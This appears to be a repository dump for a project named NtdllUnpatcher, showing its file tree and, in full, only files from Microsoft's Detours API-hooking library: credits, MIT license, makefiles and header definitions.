├── Detours-master
│   ├── .vs
│   │   └── system
│   │       └── v15
│   │           └── .suo
│   ├── CREDITS.TXT
│   ├── LICENSE.md
│   ├── Makefile
│   ├── README.md
│   ├── UpgradeLog.htm
│   ├── include
│   │   ├── detours.h
│   │   ├── detver.h
│   │   └── syelog.h
│   ├── lib.X64
│   │   ├── detours.lib
│   │   ├── detours.pdb
│   │   └── syelog.lib
│   ├── src
│   │   ├── Makefile
│   │   ├── creatwth.cpp
│   │   ├── detours.cpp
│   │   ├── detours.h
│   │   ├── detver.h
│   │   ├── disasm.cpp
│   │   ├── disolarm.cpp
│   │   ├── disolarm64.cpp
│   │   ├── disolia64.cpp
│   │   ├── disolx64.cpp
│   │   ├── disolx86.cpp
│   │   ├── image.cpp
│   │   ├── modules.cpp
│   │   ├── obj.X64
│   │   │   ├── creatwth.obj
│   │   │   ├── detours.obj
│   │   │   ├── disasm.obj
│   │   │   ├── disolarm.obj
│   │   │   ├── disolarm64.obj
│   │   │   ├── disolia64.obj
│   │   │   ├── disolx64.obj
│   │   │   ├── disolx86.obj
│   │   │   ├── image.obj
│   │   │   └── modules.obj
│   │   └── uimports.cpp
│   └── system.mak
├── NtdllUnpatcher.sln
├── NtdllUnpatcher
│   ├── NtdllUnpatcher.cpp
│   ├── NtdllUnpatcher.h
│   ├── NtdllUnpatcher.vcxproj
│   ├── NtdllUnpatcher.vcxproj.filters
│   ├── NtdllUnpatcher.vcxproj.user
│   ├── targetver.h
│   └── x64
│       ├── Debug
│       │   ├── NtdllUnpatcher.Build.CppClean.log
│       │   ├── NtdllUnpatcher.log
│       │   ├── NtdllUnpatcher.pch
│       │   ├── NtdllUnpatcher.tlog
│       │   │   ├── CL.command.1.tlog
│       │   │   ├── CL.read.1.tlog
│       │   │   ├── CL.write.1.tlog
│       │   │   ├── NtdllUnpatcher.lastbuildstate
│       │   │   ├── link-cvtres.read.1.tlog
│       │   │   ├── link-cvtres.write.1.tlog
│       │   │   ├── link-mt.read.1.tlog
│       │   │   ├── link-mt.write.1.tlog
│       │   │   ├── link-rc.read.1.tlog
│       │   │   ├── link-rc.write.1.tlog
│       │   │   ├── link.command.1.tlog
│       │   │   ├── link.read.1.tlog
│       │   │   ├── link.write.1.tlog
│       │   │   └── unsuccessfulbuild
│       │   ├── stdafx.obj
│       │   ├── vc141.idb
│       │   └── vc141.pdb
│       └── Release
│           ├── NtdllUnpatcher.Build.CppClean.log
│           ├── NtdllUnpatcher.log
│           ├── NtdllUnpatcher.obj
│           ├── NtdllUnpatcher.tlog
│           │   ├── CL.command.1.tlog
│           │   ├── CL.read.1.tlog
│           │   ├── CL.write.1.tlog
│           │   ├── NtdllUnpatcher.lastbuildstate
│           │   ├── NtdllUnpatcher.write.1u.tlog
│           │   ├── link.command.1.tlog
│           │   ├── link.read.1.tlog
│           │   └── link.write.1.tlog
│           └── vc141.pdb
├── NtdllUnpatcher_Injector
│   ├── NtdllUnpatcher_Injector.cpp
│   ├── NtdllUnpatcher_Injector.vcxproj
│   ├── NtdllUnpatcher_Injector.vcxproj.filters
│   ├── NtdllUnpatcher_Injector.vcxproj.user
│   └── x64
│       ├── Debug
│       │   ├── NtdllUnp.59AE6F00.tlog
│       │   │   ├── CL.command.1.tlog
│       │   │   ├── CL.read.1.tlog
│       │   │   ├── CL.write.1.tlog
│       │   │   ├── NtdllUnpatcher_Injector.lastbuildstate
│       │   │   ├── link.command.1.tlog
│       │   │   ├── link.read.1.tlog
│       │   │   └── link.write.1.tlog
│       │   ├── NtdllUnpatcher_Injector.log
│       │   ├── NtdllUnpatcher_Injector.obj
│       │   ├── vc141.idb
│       │   └── vc141.pdb
│       └── Release
│           ├── NtdllUnp.59AE6F00.tlog
│           │   ├── CL.command.1.tlog
│           │   ├── CL.read.1.tlog
│           │   ├── CL.write.1.tlog
│           │   ├── NtdllUnpatcher_Injector.lastbuildstate
│           │   ├── NtdllUnpatcher_Injector.write.1u.tlog
│           │   ├── link.command.1.tlog
│           │   ├── link.read.1.tlog
│           │   └── link.write.1.tlog
│           ├── NtdllUnpatcher_Injector.Build.CppClean.log
│           ├── NtdllUnpatcher_Injector.log
│           ├── NtdllUnpatcher_Injector.obj
│           └── vc141.pdb
├── README.md
└── x64
    └── Release
        ├── NtdllUnpatcher.dll
        ├── NtdllUnpatcher.lib
        └── NtdllUnpatcher_Injector.exe

/Detours-master/.vs/system/v15/.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/Detours-master/.vs/system/v15/.suo
--------------------------------------------------------------------------------
/Detours-master/CREDITS.TXT:
--------------------------------------------------------------------------------
==============================================================================
The following individuals have helped identify specific bugs and improvements
in Detours.  The entire Detours community has benefited from their help.
==============================================================================

  * Jay Krell:           Identified issue with VirtualSize == 0 files created in
                         NT 3.1 images.
                         (Build_339)

  * Igor Odnovorov:      Identified an issue with the placement of the trampoline
                         region when a function is detoured twice and the second
                         trampoline region is outside of the +/- 2GB range of
                         the target. (Build_337)

  * Jay Krell:           Identified need for some programs to enumerate the
                         address of IAT entries. (Build_336)

  * Calvin Hsia:         Identified need for some programs to change the excluded
                         system region. (Build_336)

  * Adam Smith:          Identified error in failure handling when VirtualProtect
                         cannot make pages executable because the Prohibit
                         Dynamic Code Generation mitigation policy has been
                         applied to a process. (Build_335)

  * Ben Faull:           Identified fix to detour_alloc_region_from_lo and
                         detour_alloc_region_from_hi that preserves ASLR entropy.
                         (Build_334)

  * Shaoxiang Su:        Reported errors building with Visual Studio 2015.
                         (Build_332)

  * Jay Krell:           Identified and resolved significant gaps in the X86, X64
                         and IA64 disassemblers for instructions found in code,
                         but seldom found in function prologues. (Build_331)

  * Allan Murphy:        Identified error in rep and jmp ds: encodings. (Build_331)

  * Philip Bacon:        Identified incorrect entry point return for pure
                         resource-only binaries. (Build_330)

  * Jay Krell:           Identified failure in DetourAttachEx to update nAlign.
                         (Build_330)

  * Sumit Sarin:         Helped debug error with packed binaries.
                         (Build_329)

  * Nitya Kumar Sharma:  Reported bug in DetourAfterWithDll for 32/64 agnostic
                         EXEs.
                         (Build_327)

  * Richard Black:       Identified a large number of typos in documentation.
                         (Build_326)

  * Michael Bilodeau:    Identified bug in DetourUpdateProcessWithDll when the
                         target process contains a Detours payload *after* all
                         valid PE binaries.
                         (Build_324)

  * Meera Jindal:        Reported bug in identification of target address in
                         DetourCopyInstruction for jmp[] and call[] on x86 & x64,
                         the ff15 and ff25 opcodes.
                         (Build_323)

  * Ken Johnson:         Assistance with SAL 2.0 annotations.
                         (Build_319)

  * Nick Wood:           Identified bug in DetourFindFunction on ARM.
                         (Build_314)

  * Mark Russinovich:    Helped debug DetourCreateProcessWithDllEx.
                         (Build_314)

  * John Lin:            Implementation idea for DetoursCreateProcessWithDllEx.
                         (Build_314)

  * Andrew Zawadowskiy:  Reported an improper memory page permissions
                         vulnerability in Detours 2.1. (Vulnerability does not
                         exist in versions later than Detours 2.1.)
                         (Build_223)

  * Nightxie:            Identified bug in detour_alloc_round_up_to_region.
                         (Build_310)

  * Diana Milirud:       Identified bug in B* instructions on ARM.
                         (Build_309)

  * Juan Carlos          Identified correct MSIL entry point for unsigned MSIL.
    Luciani:             (Build_308)

  * Lee Hunt             Suggested improvements in algorithm for allocation of
    Lawrence Landauer    trampoline regions on x64 to avoid collisions with
    Joe Laughlin:        system DLLs.
                         (Build_307)

  * Tyler Sims           Identified bug in handling of "anycpu" MSIL binaries
    Darren Kennedy:      on x64.
                         (Build_307)

  * Andre Vachon:        Help with optimized binaries.
                         (Build_301)

  * Chris Mann:          Identified fix not forward ported from 2.2 to 3.0.
                         (Build_301)

  * Mark Irving:         Identified bug with EXEs missing second import table.
                         (Build_300)

  * Ben Schwarz:         Identified bug in handling of multi-byte NOPs.
                         (Build_300)

  * Aaron Giles          Coded initial ARM/Thumb2 disassembler.
    Jared Henderson:     (Build_300)

  * Doug Brubacher:      Coded initial x86 disassembler.
                         (Build_100)
--------------------------------------------------------------------------------
/Detours-master/LICENSE.md:
--------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation

All rights reserved.

# MIT License

Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
--------------------------------------------------------------------------------
/Detours-master/Makefile:
--------------------------------------------------------------------------------
##############################################################################
##
##  Makefile for Detours.
##
##  Microsoft Research Detours Package
##
##  Copyright (c) Microsoft Corporation.  All rights reserved.
##

ROOT = .
!include "$(ROOT)\system.mak"

all:
    cd "$(MAKEDIR)"
    @if exist "$(MAKEDIR)\core\makefile" cd "$(MAKEDIR)\core" && $(MAKE) /NOLOGO /$(MAKEFLAGS)
    cd "$(MAKEDIR)\src"
    @$(MAKE) /NOLOGO /$(MAKEFLAGS)
    cd "$(MAKEDIR)\samples"
    @$(MAKE) /NOLOGO /$(MAKEFLAGS)
    @if exist "$(MAKEDIR)\bugs\makefile" cd "$(MAKEDIR)\bugs" && $(MAKE) /NOLOGO /$(MAKEFLAGS)
    cd "$(MAKEDIR)"

clean:
    cd "$(MAKEDIR)"
    @if exist "$(MAKEDIR)\core\makefile" cd "$(MAKEDIR)\core" && $(MAKE) /NOLOGO /$(MAKEFLAGS) clean
    cd "$(MAKEDIR)\src"
    @$(MAKE) /NOLOGO /$(MAKEFLAGS) clean
    cd "$(MAKEDIR)\samples"
    @$(MAKE) /NOLOGO /$(MAKEFLAGS) clean
    @if exist "$(MAKEDIR)\bugs\makefile" cd "$(MAKEDIR)\bugs" && $(MAKE) /NOLOGO /$(MAKEFLAGS) clean
    cd "$(MAKEDIR)"

realclean: clean
    cd "$(MAKEDIR)"
    @if exist "$(MAKEDIR)\core\makefile" cd "$(MAKEDIR)\core" && $(MAKE) /NOLOGO /$(MAKEFLAGS) realclean
    cd "$(MAKEDIR)\src"
    @$(MAKE) /NOLOGO /$(MAKEFLAGS) realclean
    cd "$(MAKEDIR)\samples"
    @$(MAKE) /NOLOGO /$(MAKEFLAGS) realclean
    @if exist "$(MAKEDIR)\bugs\makefile" cd "$(MAKEDIR)\bugs" && $(MAKE) /NOLOGO /$(MAKEFLAGS) realclean
    cd "$(MAKEDIR)"
    -rmdir /q /s $(INCDS) 2> nul
    -rmdir /q /s $(LIBDS) 2> nul
    -rmdir /q /s $(BINDS) 2> nul
    -rmdir /q /s dist 2> nul
    -del docsrc\detours.chm 2> nul
    -del /q *.msi 2>nul
    -del /q /f /s *~ 2>nul

test:
    cd "$(MAKEDIR)\samples"
    @$(MAKE) /NOLOGO /$(MAKEFLAGS) test
    cd "$(MAKEDIR)"

################################################################# End of File.
--------------------------------------------------------------------------------
/Detours-master/README.md:
--------------------------------------------------------------------------------
# Microsoft Research Detours Package

Detours is a software package for monitoring and instrumenting API calls on Windows.
Detours has been used by many ISVs and is also used by product teams at Microsoft. Detours is now available under
a standard open source license (MIT). This simplifies licensing for programmers using Detours
and allows the community to support Detours using open source tools and processes.

Detours is compatible with the Windows NT family of
operating systems: Windows NT, Windows XP, Windows Server 2003, Windows 7,
Windows 8, and Windows 10. It cannot be used by Windows Store apps
because Detours requires APIs not available to those applications.
This repo contains the source code for version 4.0.1 of Detours.

For technical documentation on Detours, see the [Detours Wiki](https://github.com/microsoft/Detours/wiki).
For directions on how to build and run samples, see the
samples [README.txt](https://github.com/Microsoft/Detours/blob/master/samples/README.TXT) file.

## Contributing

The [`Detours`](https://github.com/microsoft/detours) repository is where development is done.
Here are some ways you can participate in the project:

* [Answer questions](https://github.com/microsoft/detours/issues) about using Detours.
* [Improve the Wiki](https://github.com/microsoft/detours/wiki).
* [Submit bugs](https://github.com/microsoft/detours/issues) and help us verify fixes and changes as they are checked in.
* Review [source code changes](https://github.com/microsoft/detours/pulls).

This project has adopted the [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/). For more information see the [Code of Conduct FAQ](https://opensource.microsoft.com/codeofconduct/faq/) or contact [opencode@microsoft.com](mailto:opencode@microsoft.com) with any additional questions or comments.

## Issues, questions, and feedback

* Open an issue on [GitHub Issues](https://github.com/Microsoft/detours/issues).

## Mailing list for announcements

The detours-announce mailing list is a low-traffic email list for important announcements
about the project, such as the availability of new versions of Detours. To join it, send
an email to listserv@lists.research.microsoft.com with a
message body containing only the text SUBSCRIBE DETOURS-ANNOUNCE.
To leave it, send an email to listserv@lists.research.microsoft.com with a
message body containing only the text UNSUBSCRIBE DETOURS-ANNOUNCE.


## License

Copyright (c) Microsoft Corporation. All rights reserved.

Licensed under the [MIT](LICENSE.md) License.
--------------------------------------------------------------------------------
/Detours-master/UpgradeLog.htm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/Detours-master/UpgradeLog.htm
--------------------------------------------------------------------------------
/Detours-master/include/detver.h:
--------------------------------------------------------------------------------
//////////////////////////////////////////////////////////////////////////////
//
//  Common version parameters.
//
//  Microsoft Research Detours Package, Version 4.0.1
//
//  Copyright (c) Microsoft Corporation.  All rights reserved.
//

#define _USING_V110_SDK71_ 1
#include "winver.h"
#if 0
#include <common.ver>
#include <ntverp.h>
#else
#ifndef DETOURS_STRINGIFY
#define DETOURS_STRINGIFY(x)    DETOURS_STRINGIFY_(x)
#define DETOURS_STRINGIFY_(x)    #x
#endif

#define VER_FILEFLAGSMASK   0x3fL
#define VER_FILEFLAGS       0x0L
#define VER_FILEOS          0x00040004L
#define VER_FILETYPE        0x00000002L
#define VER_FILESUBTYPE     0x00000000L
#endif
// Bitness of the build as a string literal ("32" or "64"), produced by the
// DETOURS_STRINGIFY macro defined above.
#define VER_DETOURS_BITS    DETOURS_STRINGIFY(DETOURS_BITS)
--------------------------------------------------------------------------------
/Detours-master/include/syelog.h:
--------------------------------------------------------------------------------
//////////////////////////////////////////////////////////////////////////////
//
//  Detours Test Program (syelog.h of syelog.lib)
//
//  Microsoft Research Detours Package
//
//  Copyright (c) Microsoft Corporation.  All rights reserved.
//
#pragma once
#ifndef _SYELOGD_H_
#define _SYELOGD_H_
#include <stdarg.h>     // va_list, used by SyelogV below

#pragma pack(push, 1)
#pragma warning(push)
#pragma warning(disable: 4200)

//////////////////////////////////////////////////////////////////////////////
//
//
#define SYELOG_PIPE_NAMEA      "\\\\.\\pipe\\syelog"
#define SYELOG_PIPE_NAMEW      L"\\\\.\\pipe\\syelog"
#ifdef UNICODE
#define SYELOG_PIPE_NAME    SYELOG_PIPE_NAMEW
#else
#define SYELOG_PIPE_NAME    SYELOG_PIPE_NAMEA
#endif

//////////////////////////////////////////////////////////////////////////////
//
#define SYELOG_MAXIMUM_MESSAGE  4086    // 4096 - sizeof(header stuff)

// Wire format of one log record sent over the syelog named pipe (packed to 1 byte).
typedef struct _SYELOG_MESSAGE
{
    USHORT      nBytes;         // total size of this record, including szMessage
    BYTE        nFacility;      // one of SYELOG_FACILITY_*
    BYTE        nSeverity;      // one of SYELOG_SEVERITY_*
    DWORD       nProcessId;     // sender's process id
    FILETIME    ftOccurance;    // time the message was generated
    BOOL        fTerminate;     // TRUE when the sender is shutting down
    CHAR        szMessage[SYELOG_MAXIMUM_MESSAGE];
} SYELOG_MESSAGE, *PSYELOG_MESSAGE;


// Facility Codes.
//
#define SYELOG_FACILITY_KERNEL          0x10    // OS Kernel
#define SYELOG_FACILITY_SECURITY        0x20    // OS Security
#define SYELOG_FACILITY_LOGGING         0x30    // OS Logging-internal
#define SYELOG_FACILITY_SERVICE         0x40    // User-mode system daemon
#define SYELOG_FACILITY_APPLICATION     0x50    // User-mode application
#define SYELOG_FACILITY_USER            0x60    // User self-generated.
#define SYELOG_FACILITY_LOCAL0          0x70    // Locally defined.
#define SYELOG_FACILITY_LOCAL1          0x71    // Locally defined.
#define SYELOG_FACILITY_LOCAL2          0x72    // Locally defined.
#define SYELOG_FACILITY_LOCAL3          0x73    // Locally defined.
#define SYELOG_FACILITY_LOCAL4          0x74    // Locally defined.
#define SYELOG_FACILITY_LOCAL5          0x75    // Locally defined.
#define SYELOG_FACILITY_LOCAL6          0x76    // Locally defined.
#define SYELOG_FACILITY_LOCAL7          0x77    // Locally defined.
#define SYELOG_FACILITY_LOCAL8          0x78    // Locally defined.
#define SYELOG_FACILITY_LOCAL9          0x79    // Locally defined.

// Severity Codes.
//
#define SYELOG_SEVERITY_FATAL           0x00    // System is dead.
#define SYELOG_SEVERITY_ALERT           0x10    // Take action immediately.
#define SYELOG_SEVERITY_CRITICAL        0x20    // Critical condition.
#define SYELOG_SEVERITY_ERROR           0x30    // Error
#define SYELOG_SEVERITY_WARNING         0x40    // Warning
#define SYELOG_SEVERITY_NOTICE          0x50    // Significant condition.
#define SYELOG_SEVERITY_INFORMATION     0x60    // Informational
#define SYELOG_SEVERITY_AUDIT_FAIL      0x66    // Audit Failed
#define SYELOG_SEVERITY_AUDIT_PASS      0x67    // Audit Succeeded
#define SYELOG_SEVERITY_DEBUG           0x70    // Debugging

// Logging Functions.
//
VOID SyelogOpen(PCSTR pszIdentifier, BYTE nFacility);
VOID Syelog(BYTE nSeverity, PCSTR pszMsgf, ...);
VOID SyelogV(BYTE nSeverity, PCSTR pszMsgf, va_list args);
VOID SyelogClose(BOOL fTerminate);

#pragma warning(pop)
#pragma pack(pop)

#endif // _SYELOGD_H_
//
///////////////////////////////////////////////////////////////// End of File.
--------------------------------------------------------------------------------
/Detours-master/lib.X64/detours.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/Detours-master/lib.X64/detours.lib
--------------------------------------------------------------------------------
/Detours-master/lib.X64/detours.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/Detours-master/lib.X64/detours.pdb
--------------------------------------------------------------------------------
/Detours-master/lib.X64/syelog.lib:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/Detours-master/lib.X64/syelog.lib
--------------------------------------------------------------------------------
/Detours-master/src/Makefile:
--------------------------------------------------------------------------------
##############################################################################
##
##  Makefile for Detours.
##
##  Microsoft Research Detours Package, Version 4.0.1
##
##  Copyright (c) Microsoft Corporation.  All rights reserved.
##

ROOT = ..
!include "$(ROOT)\system.mak"

!IF "$(DETOURS_SOURCE_BROWSING)" == ""
DETOURS_SOURCE_BROWSING = 0
!ENDIF

##############################################################################
##
CFLAGS=/W4 /WX /Zi /MT /Gy /Gm- /Zl /Od

!IF $(DETOURS_SOURCE_BROWSING)==1
CFLAGS=$(CFLAGS) /FR
!ELSE
CFLAGS=$(CFLAGS) /DWIN32_LEAN_AND_MEAN /D_WIN32_WINNT=0x501
!ENDIF

!IF "$(DETOURS_TARGET_PROCESSOR)" == "IA64"
CFLAGS=$(CFLAGS) /wd4163 # intrinsic rdtebex not available; using newer Windows headers with older compiler
!ENDIF

!if defined(DETOURS_WIN_7) && defined(DETOURS_CL_17_OR_NEWER)
CFLAGS=$(CFLAGS) /D_USING_V110_SDK71_
!elseif defined(DETOURS_ANALYZE)
CFLAGS=$(CFLAGS) /analyze
!endif

OBJS = \
    $(OBJD)\detours.obj     \
    $(OBJD)\modules.obj     \
    $(OBJD)\disasm.obj      \
    $(OBJD)\image.obj       \
    $(OBJD)\creatwth.obj    \
    $(OBJD)\disolx86.obj    \
    $(OBJD)\disolx64.obj    \
    $(OBJD)\disolia64.obj   \
    $(OBJD)\disolarm.obj    \
    $(OBJD)\disolarm64.obj  \

##############################################################################
##
.SUFFIXES: .cpp .h .obj

!ifdef DETOURS_ANALYZE
.cpp{$(OBJD)}.obj:
    $(CC) $(CFLAGS) /Fd$(LIBD)\detours.pdb /Fo$(OBJD)\ /c $<
!else
.cpp{$(OBJD)}.obj::
    $(CC) $(CFLAGS) /Fd$(LIBD)\detours.pdb /Fo$(OBJD)\ /c $<
!endif

##############################################################################

all: dirs \
    $(LIBD)\detours.lib \
    $(INCD)\detours.h \
    $(INCD)\detver.h \
!IF $(DETOURS_SOURCE_BROWSING)==1
    $(OBJD)\detours.bsc \
!endif

##############################################################################

clean:
    -del *~ 2>nul
    -del $(LIBD)\detours.pdb $(LIBD)\detours.lib 2>nul
    -rmdir /q /s $(OBJD) 2>nul

realclean: clean
    -rmdir /q /s $(OBJDS) 2>nul

##############################################################################

dirs:
    @if not exist "$(INCD)" mkdir "$(INCD)" && echo.   Created $(INCD)
    @if not exist "$(LIBD)" mkdir "$(LIBD)" && echo.   Created $(LIBD)
    @if not exist "$(BIND)" mkdir "$(BIND)" && echo.   Created $(BIND)
    @if not exist "$(OBJD)" mkdir "$(OBJD)" && echo.   Created $(OBJD)

$(OBJD)\detours.bsc : $(OBJS)
    bscmake /v /n /o $@ $(OBJS:.obj=.sbr)

$(LIBD)\detours.lib : $(OBJS)
    link /lib /out:$@ $(OBJS)

$(INCD)\detours.h : detours.h
    copy detours.h $@

$(INCD)\detver.h : detver.h
    copy detver.h $@

$(OBJD)\detours.obj : detours.cpp detours.h
$(OBJD)\modules.obj : modules.cpp detours.h
$(OBJD)\disasm.obj : disasm.cpp detours.h
$(OBJD)\image.obj : image.cpp detours.h
$(OBJD)\creatwth.obj : creatwth.cpp uimports.cpp detours.h
$(OBJD)\disolx86.obj: disasm.cpp detours.h
$(OBJD)\disolx64.obj: disasm.cpp detours.h
$(OBJD)\disolia64.obj: disasm.cpp detours.h
$(OBJD)\disolarm.obj: disasm.cpp detours.h
$(OBJD)\disolarm64.obj: disasm.cpp detours.h

test: all
    cd $(MAKEDIR)\..\samples\slept
    nmake /nologo test
    cd $(MAKEDIR)

################################################################# End of File.
--------------------------------------------------------------------------------
/Detours-master/src/detours.h:
--------------------------------------------------------------------------------
/////////////////////////////////////////////////////////////////////////////
//
//  Core Detours Functionality (detours.h of detours.lib)
//
//  Microsoft Research Detours Package, Version 4.0.1
//
//  Copyright (c) Microsoft Corporation.  All rights reserved.
//

#pragma once
#ifndef _DETOURS_H_
#define _DETOURS_H_

#define DETOURS_VERSION     0x4c0c1   // 0xMAJORcMINORcPATCH

//////////////////////////////////////////////////////////////////////////////
//

#undef DETOURS_X64
#undef DETOURS_X86
#undef DETOURS_IA64
#undef DETOURS_ARM
#undef DETOURS_ARM64
#undef DETOURS_BITS
#undef DETOURS_32BIT
#undef DETOURS_64BIT

#if defined(_X86_)
#define DETOURS_X86
#define DETOURS_OPTION_BITS 64

#elif defined(_AMD64_)
#define DETOURS_X64
#define DETOURS_OPTION_BITS 32

#elif defined(_IA64_)
#define DETOURS_IA64
#define DETOURS_OPTION_BITS 32

#elif defined(_ARM_)
#define DETOURS_ARM

#elif defined(_ARM64_)
#define DETOURS_ARM64

#else
#error Unknown architecture (x86, amd64, ia64, arm, arm64)
#endif

#ifdef _WIN64
#undef DETOURS_32BIT
#define DETOURS_64BIT 1
#define DETOURS_BITS 64
// If all 64bit kernels can run one and only one 32bit architecture.
//#define DETOURS_OPTION_BITS 32
#else
#define DETOURS_32BIT 1
#undef DETOURS_64BIT
#define DETOURS_BITS 32
// If all 64bit kernels can run one and only one 32bit architecture.
//#define DETOURS_OPTION_BITS 32
#endif

// Bitness as a string literal ("32" or "64"); DETOURS_STRINGIFY is defined
// under "Helper Macros" further down in this header.
#define VER_DETOURS_BITS    DETOURS_STRINGIFY(DETOURS_BITS)

//////////////////////////////////////////////////////////////////////////////
//

#if (_MSC_VER < 1299)
typedef LONG LONG_PTR;
typedef ULONG ULONG_PTR;
#endif

///////////////////////////////////////////////// SAL 2.0 Annotations w/o SAL.
//
// These definitions are included so that Detours will build even if the
// compiler doesn't have full SAL 2.0 support.
//
#ifndef DETOURS_DONT_REMOVE_SAL_20

#ifdef DETOURS_TEST_REMOVE_SAL_20
#undef _Analysis_assume_
#undef _Benign_race_begin_
#undef _Benign_race_end_
#undef _Field_range_
#undef _Field_size_
#undef _In_
#undef _In_bytecount_
#undef _In_count_
#undef _In_opt_
#undef _In_opt_bytecount_
#undef _In_opt_count_
#undef _In_opt_z_
#undef _In_range_
#undef _In_reads_
#undef _In_reads_bytes_
#undef _In_reads_opt_
#undef _In_reads_opt_bytes_
#undef _In_reads_or_z_
#undef _In_z_
#undef _Inout_
#undef _Inout_opt_
#undef _Inout_z_count_
#undef _Out_
#undef _Out_opt_
#undef _Out_writes_
#undef _Outptr_result_maybenull_
#undef _Readable_bytes_
#undef _Success_
#undef _Writable_bytes_
#undef _Pre_notnull_
#endif

#if defined(_Deref_out_opt_z_) && !defined(_Outptr_result_maybenull_)
#define _Outptr_result_maybenull_ _Deref_out_opt_z_
#endif

#if defined(_In_count_) && !defined(_In_reads_)
#define _In_reads_(x) _In_count_(x)
#endif

#if defined(_In_opt_count_) && !defined(_In_reads_opt_)
#define _In_reads_opt_(x) _In_opt_count_(x)
#endif

#if defined(_In_opt_bytecount_) && !defined(_In_reads_opt_bytes_)
#define _In_reads_opt_bytes_(x) _In_opt_bytecount_(x)
#endif

#if defined(_In_bytecount_) && !defined(_In_reads_bytes_)
#define _In_reads_bytes_(x) _In_bytecount_(x)
#endif

#ifndef _In_
#define _In_
#endif

#ifndef _In_bytecount_
#define _In_bytecount_(x)
#endif

#ifndef _In_count_
#define _In_count_(x)
#endif

#ifndef _In_opt_
#define _In_opt_
#endif

#ifndef _In_opt_bytecount_
#define _In_opt_bytecount_(x)
#endif

#ifndef _In_opt_count_
#define _In_opt_count_(x)
#endif

#ifndef _In_opt_z_
#define _In_opt_z_
#endif

#ifndef _In_range_
#define _In_range_(x,y)
#endif

#ifndef _In_reads_
#define _In_reads_(x)
#endif

#ifndef _In_reads_bytes_
#define _In_reads_bytes_(x)
#endif

#ifndef _In_reads_opt_
#define _In_reads_opt_(x)
#endif

#ifndef _In_reads_opt_bytes_
#define _In_reads_opt_bytes_(x)
#endif

#ifndef _In_reads_or_z_
#define _In_reads_or_z_
#endif

#ifndef _In_z_
#define _In_z_
#endif

#ifndef _Inout_
#define _Inout_
#endif

#ifndef _Inout_opt_
#define _Inout_opt_
#endif

#ifndef _Inout_z_count_
#define _Inout_z_count_(x)
#endif

#ifndef _Out_
#define _Out_
#endif

#ifndef _Out_opt_
#define _Out_opt_
#endif

#ifndef _Out_writes_
#define _Out_writes_(x)
#endif

#ifndef _Outptr_result_maybenull_
#define _Outptr_result_maybenull_
#endif

#ifndef _Writable_bytes_
#define _Writable_bytes_(x)
#endif

#ifndef _Readable_bytes_
#define _Readable_bytes_(x)
#endif

#ifndef _Success_
#define _Success_(x)
#endif

#ifndef _Pre_notnull_
#define _Pre_notnull_
#endif

#ifdef DETOURS_INTERNAL

#pragma warning(disable:4615) // unknown warning type (suppress with older compilers)

#ifndef _Benign_race_begin_
#define _Benign_race_begin_
#endif

#ifndef _Benign_race_end_
#define _Benign_race_end_
#endif

#ifndef _Field_size_
#define _Field_size_(x)
#endif

#ifndef _Field_range_
#define _Field_range_(x,y)
#endif

#ifndef _Analysis_assume_
#define _Analysis_assume_(x)
#endif

#endif // DETOURS_INTERNAL
#endif // DETOURS_DONT_REMOVE_SAL_20

//////////////////////////////////////////////////////////////////////////////
//
#ifndef GUID_DEFINED
#define GUID_DEFINED
typedef struct  _GUID
{
    DWORD Data1;
    WORD Data2;
    WORD Data3;
    BYTE Data4[ 8 ];
} GUID;

#ifdef INITGUID
#define DEFINE_GUID(name, l, w1, w2, b1, b2, b3, b4, b5, b6, b7, b8) \
        const GUID name \
                = { l, w1, w2, { b1, b2,  b3,  b4,  b5,  b6,  b7,  b8 } }
#else
#define DEFINE_GUID(name, l, w1, w2, b1, b2, b3, b4, b5, b6, b7, b8) \
        const GUID name
#endif // INITGUID
#endif // !GUID_DEFINED

#if defined(__cplusplus)
#ifndef _REFGUID_DEFINED
#define _REFGUID_DEFINED
#define REFGUID             const GUID &
#endif // !_REFGUID_DEFINED
#else // !__cplusplus
#ifndef _REFGUID_DEFINED
#define _REFGUID_DEFINED
#define REFGUID             const GUID * const
#endif // !_REFGUID_DEFINED
#endif // !__cplusplus

#ifndef ARRAYSIZE
#define ARRAYSIZE(x)    (sizeof(x)/sizeof(x[0]))
#endif

//
//////////////////////////////////////////////////////////////////////////////

#ifdef __cplusplus
extern "C" {
#endif // __cplusplus

/////////////////////////////////////////////////// Instruction Target Macros.
//
#define DETOUR_INSTRUCTION_TARGET_NONE          ((PVOID)0)
#define DETOUR_INSTRUCTION_TARGET_DYNAMIC       ((PVOID)(LONG_PTR)-1)
#define DETOUR_SECTION_HEADER_SIGNATURE         0x00727444   // "Dtr\0"

extern const GUID DETOUR_EXE_RESTORE_GUID;
extern const GUID DETOUR_EXE_HELPER_GUID;

#define DETOUR_TRAMPOLINE_SIGNATURE             0x21727444  // Dtr!
